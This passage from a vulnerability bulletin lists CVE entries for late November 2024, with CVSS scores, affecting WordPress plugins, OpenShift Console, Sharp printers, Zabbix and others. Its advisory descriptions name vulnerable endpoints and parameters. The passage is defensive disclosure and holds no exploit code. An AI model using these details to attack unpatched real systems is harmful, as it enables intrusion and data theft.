A flaw was found in OpenShift Console. A Server Side Request Forgery (SSRF) attack can happen if an attacker supplies all or part of a URL to the server to query. The server is considered to be in a privileged network position and can often reach exposed services that aren't readily available to clients due to network filtering. Leveraging such an attack vector, the attacker can have an impact on other services and potentially disclose information or have other nefarious effects on the system. The /api/dev-console/proxy/internet endpoint on the OpenShit Console allows authenticated users to have the console's pod perform arbitrary and fully controlled HTTP(s) requests. The full response to these requests is returned by the endpoint. While the name of this endpoint suggests the requests are only bound to the internet, no such checks are in place. An authenticated user can therefore ask the console to perform arbitrary HTTP requests from outside the cluster to a service inside the cluster. | 2024-11-25 | 5.3 | CVE-2024-6538 |
| Rejuan Ahamed--Best Addons for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rejuan Ahamed Best Addons for Elementor allows Stored XSS.This issue affects Best Addons for Elementor: from n/a through 1.0.5. | 2024-11-30 | 6.5 | CVE-2024-53763 |
| rswebstudios--Image Alt Text |
The Image Alt Text plugin for WordPress is vulnerable to unauthorized modification of data| due to a missing capability check on the iat_add_alt_txt_action and iat_update_alt_txt_action AJAX actions in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update the alt text on arbitrary images. | 2024-11-28 | 4.3 | CVE-2024-11918 |
| sanskritforum--Skt NURCaptcha |
The Skt NURCaptcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.0. This is due to missing or incorrect nonce validation in the skt-nurc-admin.php file. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-11-26 | 6.1 | CVE-2024-11342 |
| sayedulsayem--Support SVG Upload svg files in wordpress without hassle |
The Support SVG - Upload svg files in wordpress without hassle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-11-26 | 6.4 | CVE-2024-11091 |
| Sergio Mic--SimpleSchema |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sergio Micó SimpleSchema allows DOM-Based XSS.This issue affects SimpleSchema: from n/a through 1.7.6.9. | 2024-11-30 | 6.5 | CVE-2024-53771 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
Affected devices create coredump files when crashed, storing them with world-readable permission. Any local user of the device can examine the coredump files, and research the memory contents. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 5.9 | CVE-2024-28955 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
User passwords are decrypted and stored on memory before any user logged in. Those decrypted passwords can be retrieved from the coredump file. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 5.9 | CVE-2024-29146 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
User passwords are decrypted and stored on memory before any user logged in. Those decrypted passwords can be retrieved from the coredump file. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 5.9 | CVE-2024-29978 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
User passwords are decrypted and stored on memory before any user logged in. Those decrypted passwords can be retrieved from the coredump file. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 5.9 | CVE-2024-32151 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
Admin authentication can be bypassed with some specific invalid credentials, which allows logging in with an administrative privilege. Sharp Corporation states the telnet feature is implemented on older models only, and is planning to provide the firmware update to remove the feature. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 5.3 | CVE-2024-33616 |
| Sharp Corporation--Multiple MFPs (multifunction printers) |
The web interface of the affected devices is designed to hide the LDAP credentials even for administrative users. But configuring LDAP authentication to "SIMPLE", the device communicates with the LDAP server in clear-text. The LDAP password can be retrieved from this clear-text communication. As for the details of affected product names, model numbers, and versions, refer to the information provided by the respective vendors listed under [References]. | 2024-11-26 | 5.3 | CVE-2024-34162 |
| Siempelkamp--UmweltOffice |
A low privileged remote attacker can insert a SQL injection in the web application due to improper handling of HTTP request input data which allows to exfiltrate all data. | 2024-11-28 | 6.5 | CVE-2024-8308 |
| sigstore--sigstore-java |
sigstore-java is a sigstore java client for interacting with sigstore infrastructure. sigstore-java has insufficient verification for a situation where a validly-signed but "mismatched" bundle is presented as proof of inclusion into a transparency log. This bug impacts clients using any variation of KeylessVerifier.verify(). The verifier may accept a bundle with an unrelated log entry, cryptographically verifying everything but fails to ensure the log entry applies to the artifact in question, thereby "verifying" a bundle without any proof the signing event was logged. This allows the creation of a bundle without fulcio certificate and private key combined with an unrelated but time-correct log entry to fake logging of a signing event. A malicious actor using a compromised identity may want to do this to prevent discovery via rekor's log monitors. The signer's identity will still be available to the verifier. The signature on the bundle must still be on the correct artifact for the verifier to pass. sigstore-gradle-plugin and sigstore-maven-plugin are not affected by this as they only provide signing functionality. This issue has been patched in v1.1.0 release with PR #856. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-26 | 5.5 | CVE-2024-53267 |
| Skybootstrap--Elementor Image Gallery Plugin |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Skybootstrap Elementor Image Gallery Plugin allows Stored XSS.This issue affects Elementor Image Gallery Plugin: from n/a through 1.0.3. | 2024-12-01 | 6.5 | CVE-2024-53744 |
| SMA--Sunny Central SC 1760-US |
An authenticated attacker with low privileges may use a SQL Injection vulnerability in the affected products administration panel to gain read and write access to a specific log file of the device. | 2024-11-27 | 5.4 | CVE-2024-11025 |
| smub--Sugar Calendar Event Calendar, Event Tickets, and Event Management Platform |
The Sugar Calendar - Simple Event Management plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.3.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-26 | 6.1 | CVE-2024-10878 |
| SocialEvolution--WP Find Your Nearest |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SocialEvolution WP Find Your Nearest allows Stored XSS.This issue affects WP Find Your Nearest: from n/a through 0.3.1. | 2024-11-30 | 6.5 | CVE-2024-53757 |
| SoftHopper--Softtemplates For Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SoftHopper Softtemplates For Elementor allows DOM-Based XSS.This issue affects Softtemplates For Elementor: from n/a through 1.0.8. | 2024-11-30 | 6.5 | CVE-2024-53764 |
| SourceCodester--Best House Rental Management System |
A vulnerability classified as critical has been found in SourceCodester Best House Rental Management System 1.0. This affects an unknown part of the file /rental/ajax.php?action=delete_tenant of the component POST Request Handler. The manipulation of the argument id leads to improper authorization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-27 | 6.5 | CVE-2024-11860 |
| SourceCodester--Best House Rental Management System |
A vulnerability, which was classified as problematic, was found in SourceCodester Best House Rental Management System 1.0. Affected is an unknown function of the file /rental/ajax.php?action=delete_user of the component POST Request Handler. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-26 | 4.3 | CVE-2024-11743 |
| Sparkle WP--Sparkle Elementor Kit |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sparkle WP Sparkle Elementor Kit allows DOM-Based XSS.This issue affects Sparkle Elementor Kit: from n/a through 2.0.9. | 2024-11-30 | 6.5 | CVE-2024-53774 |
| streamweasels--StreamWeasels YouTube Integration |
The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sw-youtube-embed' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-28 | 6.4 | CVE-2024-11788 |
| subratamal--Wallet for WooCommerce |
The Wallet for WooCommerce plugin for WordPress is vulnerable to incorrect conversion between numeric types in all versions up to, and including, 1.5.6. This is due to a numerical logic flaw when transferring funds to another user. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create funds during a transfer and distribute these funds to any number of other users or their own account, rendering products free. Attackers could also request to withdraw funds if the Wallet Withdrawal extension is used and the request is approved by an administrator. | 2024-11-28 | 6.5 | CVE-2024-7747 |
| SUSE--hackweek |
Missing sanitation of inputs allowed arbitrary users to conduct a stored XSS attack that triggers for users that view a certain project | 2024-11-28 | 5.7 | CVE-2024-52283 |
| SUSE--SUSE Manager Server 5.0 |
The uyuni-server-attestation systemd service needs a database_password environment variable. This file has 640 permission, and cannot be shown users, but the environment is still exposed by systemd to non-privileged users. | 2024-11-28 | 5.5 | CVE-2024-22037 |
| Tenda--FH451 |
A vulnerability classified as problematic was found in Tenda FH451, FH1201, FH1202 and FH1206 up to 20241129. Affected by this vulnerability is the function websReadEvent of the file /goform/GetIPTV. The manipulation of the argument Content-Length leads to null pointer dereference. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-30 | 4.3 | CVE-2024-12002 |
| Tenda--i9 |
A vulnerability was found in Tenda i9 1.0.0.8(3828) and classified as critical. This issue affects the function websReadEvent of the file /goform/GetIPTV. The manipulation leads to null pointer dereference. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-25 | 6.5 | CVE-2024-11650 |
| Terry Lin--WP MathJax |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Terry Lin WP MathJax allows Stored XSS.This issue affects WP MathJax: from n/a through 1.0.1. | 2024-11-30 | 6.5 | CVE-2024-53758 |
| Terry Lin--WP Mermaid |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Terry Lin WP Mermaid allows Stored XSS.This issue affects WP Mermaid: from n/a through 1.0.2. | 2024-12-01 | 6.5 | CVE-2024-53748 |
| themeisle--Otter Blocks Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE |
The Otter Blocks - Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 3.0.6 via the get_image function. This makes it possible for unauthenticated attackers to view arbitrary images on the server, which can contain sensitive information. | 2024-11-27 | 5.3 | CVE-2024-11219 |
| treeverse--lakeFS |
lakeFS is an open-source tool that transforms object storage into a Git-like repository. Existing lakeFS users who have issued credentials to users who have been deleted are affected by this vulnerability. When creating a new user with the same username as a deleted user, that user will inherit all of the previous user's credentials. This issue has been addressed in release version 1.33.0 and all users are advised to upgrade. The only known workaround for those who cannot upgrade is to not reuse usernames. | 2024-11-26 | 5.7 | CVE-2024-43784 |
| tychesoftwares--Product Input Fields for WooCommerce |
The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.9 via the handle_downloads() function due to insufficient file path validation/sanitization. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2024-11-26 | 6.5 | CVE-2024-10857 |
| Unknown--adBuddy+ (AdBlocker Detection) by NetfunkDesign |
The adBuddy+ (AdBlocker Detection) by NetfunkDesign WordPress plugin through 1.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-11-28 | 4.8 | CVE-2024-10510 |
| Unknown--Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) |
The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) WordPress plugin before 5.10.3 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-11-28 | 5.4 | CVE-2024-10493 |
| Unknown--Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) |
The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) WordPress plugin before 5.10.3 does not validate and escape some of its Cookie Consent block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-11-29 | 5.4 | CVE-2024-10980 |
| Unknown--Everest Forms |
The Everest Forms WordPress plugin before 3.0.4.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-11-26 | 4.8 | CVE-2024-10471 |
| Unknown--Logo Slider |
The Logo Slider WordPress plugin before 4.5.0 does not sanitise and escape some of its Logo Settings when outputing them in pages where the Logo Slider shortcode is embed, which could allow users with a role as low as Author to perform Cross-Site Scripting attacks. | 2024-11-28 | 5.4 | CVE-2024-10473 |
| Unknown--Logo Slider |
The Logo Slider WordPress plugin before 4.5.0 does not sanitise and escape some of its Logo and Slider settings, which could allow high privilege users such as Contributor to perform Stored Cross-Site Scripting | 2024-11-28 | 5.4 | CVE-2024-10896 |
| Unknown--Photo Gallery by 10Web |
The Photo Gallery by 10Web WordPress plugin before 1.8.31 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-11-29 | 4.8 | CVE-2024-10704 |
| Unknown--Photo Gallery, Sliders, Proofing and Themes |
The Photo Gallery, Sliders, Proofing and WordPress plugin before 3.59.5 does not sanitise and escape some of its Images settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | 2024-11-25 | 4.8 | CVE-2024-6393 |
| Unknown--WPForms |
The WPForms WordPress plugin before 1.9.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-11-25 | 4.8 | CVE-2024-7056 |
| Unknown--YaDisk Files |
The YaDisk Files WordPress plugin through 1.2.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. | 2024-11-25 | 6.8 | CVE-2024-10709 |
| vinoth06--Random Banner |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in vinoth06 Random Banner allows Stored XSS.This issue affects Random Banner: from n/a through 4.2.9. | 2024-11-30 | 6.5 | CVE-2024-53787 |
| VMware--VMware Aria Operations |
VMware Aria Operations contains a stored cross-site scripting vulnerability. A malicious actor with editing access to email templates might inject malicious script leading to stored cross-site scripting in the product VMware Aria Operations. | 2024-11-26 | 6.8 | CVE-2024-38833 |
| VMware--VMware Aria Operations |
VMware Aria Operations contains a stored cross-site scripting vulnerability. A malicious actor with editing access to cloud provider might be able to inject malicious script leading to stored cross-site scripting in the product VMware Aria Operations. | 2024-11-26 | 6.5 | CVE-2024-38834 |
| welliamcao--OpsManage |
A vulnerability was found in welliamcao OpsManage 3.0.1/3.0.2/3.0.3/3.0.4/3.0.5. It has been rated as critical. This issue affects the function deploy_host_vars of the file /apps/api/views/deploy_api.py of the component API Endpoint. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-25 | 6.3 | CVE-2024-11662 |
| WP Mailster--WP Mailster |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Mailster allows Stored XSS.This issue affects WP Mailster: from n/a through 1.8.16.0. | 2024-11-28 | 6.5 | CVE-2024-53737 |
| wpdevteam--EmbedPress Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents |
The EmbedPress - Embed PDF, 3D Flipbook, Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Audios, Google Maps in Gutenberg Block & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'provider_name parameter in all versions up to, and including, 4.1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-28 | 6.4 | CVE-2024-11203 |
| wphostingdev--Login with Vipps and MobilePay |
The Login with Vipps and MobilePay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'continue-with-vipps' shortcode in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-28 | 6.4 | CVE-2024-11786 |
| wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups |
The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized form submissions due to a missing capability check on the submit_form() function in all versions up to, and including, 7.8.5. This makes it possible for unauthenticated attackers to submit unpublished forms. | 2024-11-27 | 5.3 | CVE-2024-10580 |
| wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups |
The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the preview_module() function in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view unpublished forms. | 2024-11-26 | 4.3 | CVE-2024-10579 |
| wproyal--Royal Elementor Addons and Templates |
The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.7.1003 via the 'wpr-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to. | 2024-11-28 | 4.3 | CVE-2024-10798 |
| Zabbix--Zabbix |
The implementation of atob in "Zabbix JS" allows to create a string with arbitrary content and use it to access internal properties of objects. | 2024-11-26 | 6.5 | CVE-2024-36463 |
| Zabbix--Zabbix |
There was discovered a use after free bug in browser.c in the es_browser_get_variant function | 2024-11-27 | 4.4 | CVE-2024-42326 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| Axis Communications AB--AXIS OS |
Erik de Jong, member of the AXIS OS Bug Bounty Program, has found that the VAPIX API ftptest.cgi did not have a sufficient input validation allowing for a possible command injection leading to being able to transfer files from/to the Axis device. This flaw can only be exploited after authenticating with an administrator-privileged service account. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution. | 2024-11-26 | 3.8 | CVE-2024-8160 |
| code-projects--Blood Bank System |
A vulnerability was found in code-projects Blood Bank System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /controllers/updatesettings.php of the component Setting Handler. The manipulation of the argument firstname leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-11-30 | 3.5 | CVE-2024-12000 |
| code-projects--Crud Operation System |
A vulnerability, which was classified as problematic, has been found in code-projects Crud Operation System 1.0. This issue affects some unknown processing of the file /add.php. The manipulation of the argument saddress leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-11-27 | 3.5 | CVE-2024-11820 |
| code-projects--Farmacia |
A vulnerability was found in code-projects Farmacia 1.0. It has been classified as problematic. This affects an unknown part of the file usuario.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-11-25 | 3.5 | CVE-2024-11660 |
| code-projects--Farmacia |
A vulnerability has been found in code-projects Farmacia 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /pagamento.php. The manipulation of the argument total leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-29 | 3.5 | CVE-2024-11995 |
| code-projects--Farmacia |
A vulnerability was found in code-projects Farmacia 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /editar-fornecedor.php. The manipulation of the argument cidade leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-11-30 | 3.5 | CVE-2024-11996 |
| code-projects--Farmacia |
A vulnerability was found in code-projects Farmacia 1.0. It has been classified as problematic. This affects an unknown part of the file /vendas.php. The manipulation of the argument notaFiscal leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-30 | 3.5 | CVE-2024-11997 |
| code-projects--Wazifa System |
A vulnerability classified as problematic has been found in code-projects Wazifa System 1.0. Affected is an unknown function of the file /controllers/updatesettings.php of the component Setting Handler. The manipulation of the argument firstname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-11-30 | 3.5 | CVE-2024-12001 |
| CodeAstro--Hospital Management System |
A vulnerability has been found in CodeAstro Hospital Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /backend/admin/his_admin_register_patient.php of the component Add Patient Details Page. The manipulation of the argument pat_fname/pat_ailment/pat_lname/pat_age/pat_dob/pat_number/pat_phone/pat_type/pat_addr leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-26 | 3.5 | CVE-2024-11675 |
| CodeAstro--Hospital Management System |
A vulnerability was found in CodeAstro Hospital Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /backend/admin/his_admin_add_lab_equipment.php of the component Add Laboratory Equipment Page. The manipulation of the argument eqp_code/eqp_name/eqp_vendor/eqp_desc/eqp_dept/eqp_status/eqp_qty leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-26 | 3.5 | CVE-2024-11676 |
| CodeAstro--Hospital Management System |
A vulnerability was found in CodeAstro Hospital Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /backend/admin/his_admin_add_vendor.php of the component Add Vendor Details Page. The manipulation of the argument v_name/v_adr/v_number/v_email/v_phone/v_desc leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-11-26 | 3.5 | CVE-2024-11677 |
| CodeAstro--Hospital Management System |
A vulnerability was found in CodeAstro Hospital Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /backend/doc/his_doc_register_patient.php. The manipulation of the argument pat_fname/pat_ailment/pat_lname/pat_age/pat_dob/pat_number/pat_phone/pat_type/pat_addr leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2024-11-26 | 3.5 | CVE-2024-11678 |
| Guizhou Xiaoma Technology--jpress |
A vulnerability classified as problematic was found in Guizhou Xiaoma Technology jpress 5.1.2. Affected by this vulnerability is an unknown functionality of the file /commons/attachment/upload of the component Avatar Handler. The manipulation of the argument files leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-11-28 | 3.5 | CVE-2024-11971 |
| nofusscomputing--centurion_erp |
Centurion ERP (Enterprise Rescource Planning) is a simple application developed to provide open source IT management with a large emphasis on the IT Service Management (ITSM) modules. A user who is authenticated and has view permissions for a ticket, can view the tickets of another organization they are not apart of. Users with following permissions are applicable: 1. `view_ticket_change` permission can view change tickets from organizations they are not apart of. 2. `view_ticket_incident` permission can view incident tickets from organizations they are not apart of. 3. `view_ticket_request` permission can view request tickets from organizations they are not apart of. 4. `view_ticket_problem` permission can view problem tickets from organizations they are not apart of. The access to view the tickets from different organizations is only applicable when browsing the API endpoints for the tickets in question. The Centurion UI is not affected. Project Tasks, although a "ticket type" are also **Not** affected. This issue has been addressed in release version 1.3.1 and users are advised to upgrade. Users unable to upgrade may remove the ticket view permissions from users which would alleviate this vulnerability, if this is deemed not-viable, Upgrading is recommended. | 2024-11-27 | 1.9 | CVE-2024-53855 |
| SourceCodester--Best House Rental Management System |
A vulnerability, which was classified as problematic, has been found in SourceCodester Best House Rental Management System 1.0. This issue affects some unknown processing of the file /rental/ajax.php?action=save_tenant. The manipulation of the argument lastname/firstname/middlename leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | 2024-11-26 | 3.5 | CVE-2024-11742 |
| SUSE--Container suse/manager/5.0/x86_64/server:5.0.2.7.8.1 |
A Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in the Setup Wizard, HTTP Proxy credentials pane in spacewalk-web allows attackers to attack users by providing specially crafted URLs to click. This issue affects Container suse/manager/5.0/x86_64/server:5.0.2.7.8.1: before 5.0.15-150600.3.10.2; SUSE Manager Server Module 4.3: before 4.3.42-150400.3.52.1. | 2024-11-28 | 3.5 | CVE-2024-49502 |
| SUSE--Container suse/manager/5.0/x86_64/server:5.0.2.7.8.1 |
A Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in SUSE manager allows attackers to execute Javascript code in the organization credentials sub page. This issue affects Container suse/manager/5.0/x86_64/server:5.0.2.7.8.1: before 5.0.15-150600.3.10.2; SUSE Manager Server Module 4.3: before 4.3.42-150400.3.52.1. | 2024-11-28 | 3.5 | CVE-2024-49503 |
| Unknown--YaDisk Files |
The YaDisk Files WordPress plugin through 1.2.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | 2024-11-25 | 3.5 | CVE-2024-10710 |
| Zabbix--Zabbix |
The reported vulnerability is a stack buffer overflow in the zbx_snmp_cache_handle_engineid function within the Zabbix server/proxy code. This issue occurs when copying data from session->securityEngineID to local_record.engineid without proper bounds checking. | 2024-11-27 | 3 | CVE-2024-36468 |
| Zabbix--Zabbix |
When the webdriver for the Browser object downloads data from a HTTP server, the data pointer is set to NULL and is allocated only in curl_write_cb when receiving data. If the server's response is an empty document, then wd->data in the code below will remain NULL and an attempt to read from it will result in a crash. | 2024-11-27 | 3.3 | CVE-2024-42328 |
| Zabbix--Zabbix |
The webdriver for the Browser object expects an error object to be initialized when the webdriver_session_query function fails. But this function can fail for various reasons without an error description and then the wd->error will be NULL and trying to read from it will result in a crash. | 2024-11-27 | 3.3 | CVE-2024-42329 |
| Zabbix--Zabbix |
In the src/libs/zbxembed/browser.c file, the es_browser_ctor method retrieves a heap pointer from the Duktape JavaScript engine. This heap pointer is subsequently utilized by the browser_push_error method in the src/libs/zbxembed/browser_error.c file. A use-after-free bug can occur at this stage if the wd->browser heap pointer is freed by garbage collection. | 2024-11-27 | 3.3 | CVE-2024-42331 |
| Zabbix--Zabbix |
The researcher is showing that due to the way the SNMP trap log is parsed, an attacker can craft an SNMP trap with additional lines of information and have forged data show in the Zabbix UI. This attack requires SNMP auth to be off and/or the attacker to know the community/auth details. The attack requires an SNMP item to be configured as text on the target host. | 2024-11-27 | 3.7 | CVE-2024-42332 |
| Zabbix--Zabbix |
When a URL is added to the map element, it is recorded in the database with sequential IDs. Upon adding a new URL, the system retrieves the last sysmapelementurlid value and increments it by one. However, an issue arises when a user manually changes the sysmapelementurlid value by adding sysmapelementurlid + 1. This action prevents others from adding URLs to the map element. | 2024-11-26 | 2.2 | CVE-2024-22117 |
| Zabbix--Zabbix |
When exporting media types, the password is exported in the YAML in plain text. This appears to be a best practices type issue and may have no actual impact. The user would need to have permissions to access the media types and therefore would be expected to have access to these passwords. | 2024-11-27 | 2.7 | CVE-2024-36464 |
| Zabbix--Zabbix |
The researcher is showing that it is possible to leak a small amount of Zabbix Server memory using an out of bounds read in src/libs/zbxmedia/email.c | 2024-11-27 | 2.7 | CVE-2024-42333 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| autolab--Autolab |
Autolab is a course management service that enables auto-graded programming assignments. From Autolab versions v.3.0.0 onward students can download all assignments from another student, as long as they are logged in, using the download_all_submissions feature. This can allow for leakage of submissions to unauthorized users, such as downloading submissions from other students in the class, or even instructor test submissions, given they know their user IDs. This issue has been patched in commit `1aa4c769` which is not yet in a release version, but is expected to be included in version 3.0.3. Users are advised to either manually patch or to wait for version 3.0.3. As a workaround administrators can disable the feature. | 2024-11-25 | not yet calculated | CVE-2024-53258 |
| BoidCMS--BoidCMS |
BoidCMS is a free and open-source flat file CMS for building simple websites and blogs, developed using PHP and uses JSON as a database. In affected versions a reflected Cross-site Scripting (XSS) vulnerability exists in the /admin?page=media endpoint in the file parameter, allowing an attacker to inject arbitrary JavaScript code. This code could be used to steal the user's session cookie, perform phishing attacks, or deface the website. This issue has been addressed in version 2.1.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-25 | not yet calculated | CVE-2024-53255 |
| bunkerity--bunkerweb |
bunkerweb is an Open-source and next-generation Web Application Firewall (WAF). A open redirect vulnerability exists in the loading endpoint, allowing attackers to redirect authenticated users to arbitrary external URLs via the "next" parameter. The loading endpoint accepts and uses an unvalidated "next" parameter for redirects. Ex. visiting: `/loading?next=https://google.com` while authenticated will cause the page will redirect to google.com. This vulnerability could be used in phishing attacks by redirecting users from a legitimate application URL to malicious sites. This issue has been addressed in version 1.5.11. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-11-27 | not yet calculated | CVE-2024-53264 |
| Century Systems Co., Ltd.--FutureNet NXR-G110 series |
